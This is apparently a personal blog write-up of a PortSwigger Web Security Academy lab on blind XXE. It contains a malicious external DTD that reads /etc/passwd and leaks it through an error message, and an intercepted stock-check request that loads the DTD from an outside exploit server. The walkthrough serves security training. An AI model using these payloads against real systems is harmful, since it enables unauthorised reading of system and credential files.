Lab: Exploiting blind XXE to retrieve data via error messages

Posted on 2023-05-08 | Post modified | In Security Practice｜Portswigger Web Security Academy｜XXE｜External Malicious Server |

Lab: Exploiting blind XXE to retrieve data via error messages

tags: `Portswigger Web Security Academy` `Web`

Description: This lab has a “Check stock” feature that parses XML input but does not display the result.
Goal: To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file. The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

Recon

This is very similar to the previous lab(Exploiting blind XXE to exfiltrate data using a malicious external DTD)

Complete Malicious Server Payload and Store

 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
 %eval;
 %exfil;

Complete Intercept Packet Payload

Intercept the packet that you click Check stock button in arbitrary product page.

Copy and paste your malicious server URL to YOUR-DTD-URL, e.g. https://exploit-{YOUR-RANDOM-URL}.exploit-server.net/exploit
1
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
Send packet!!!

Exp

Malicious Server Payload

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

Intercept Packet Payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ad100a2040f8d8e821cce250179002c.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
    <productId>
        1
    </productId>
    <storeId>
        1
    </storeId>
</stockCheck>

Post author: SBK6401
Post link: https://bernie6401.github.io/Lab-Exploiting-blind-XXE-to-retrieve-data-via-error-messages/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.